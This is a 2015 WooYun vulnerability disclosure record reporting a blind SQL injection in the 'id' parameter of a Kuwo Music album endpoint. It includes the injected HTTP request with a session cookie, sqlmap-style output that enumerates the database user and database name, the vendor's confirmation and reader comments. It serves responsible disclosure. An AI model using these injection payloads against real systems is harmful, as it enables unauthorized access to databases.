当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0127464

漏洞标题:酷我音乐某处MySQL盲注漏洞(root权限)

相关厂商:酷我音乐

漏洞作者: 紫霞仙子

提交时间:2015-07-18 12:03

修复时间:2015-09-03 10:00

公开时间:2015-09-03 10:00

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:8

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-18: 细节已通知厂商并且等待厂商处理中
2015-07-20: 厂商已经确认,细节仅向厂商公开
2015-07-30: 细节向核心白帽子及相关领域专家公开
2015-08-09: 细节向普通白帽子公开
2015-08-19: 细节向实习白帽子公开
2015-09-03: 细节向公众公开

简要描述:

详细说明:

修复不当吧,
GET /album/h/xinQingView?id=8 AND 3*2=6 AND 892=892 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://album.kuwo.cn/
Cookie: JSESSIONID=D608828B56CD514EC66631C60BF385FE.worker1
Host: album.kuwo.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.0 Safari/537.36
Accept: */*

漏洞证明:

---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=8 AND 8944=8944
---
[00:24:27] [INFO] the back-end DBMS is MySQL
web application technology: JSP
back-end DBMS: MySQL 5
[00:24:27] [INFO] fetching current user
[00:24:27] [WARNING] running in a single-thread mode. Please consider usage of o
ption '--threads' for faster data retrieval
[00:24:27] [INFO] retrieved: root@192.168.0.184
current user: 'root@192.168.0.184'
[00:24:51] [INFO] testing if current user is DBA
[00:24:51] [INFO] fetching current user
[00:24:51] [WARNING] in case of continuous data retrieval problems you are advis
ed to try a switch '--no-cast' or switch '--hex'
current user is DBA: False
[00:24:51] [INFO] fetching database names
[00:24:51] [INFO] fetching number of databases
[00:24:51] [INFO] retrieved:
[00:24:51] [ERROR] unable to retrieve the number of databases
[00:24:51] [INFO] falling back to current database
[00:24:51] [INFO] fetching current database
[00:24:51] [INFO] retrieved: ACT
available databases [1]:
[*] ACT

修复方案:

fix

版权声明:转载请注明来源 紫霞仙子@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:7

确认时间:2015-07-20 09:58

厂商回复:

感谢对酷我的支持

最新状态:

暂无


漏洞评价:

评论

  1. 2015-07-19 02:46 | _Thorns ( 普通白帽子 | Rank:882 漏洞数:157 | 收wb 1:5 无限量收 [平台担保]))

    我勒个去,参见峰会也不停止刷洞阿。

  2. 2015-07-19 10:39 | 紫霞仙子 ( 普通白帽子 | Rank:2027 漏洞数:279 | 天天向上 !!!)

    @_Thorns 悄悄的,哈哈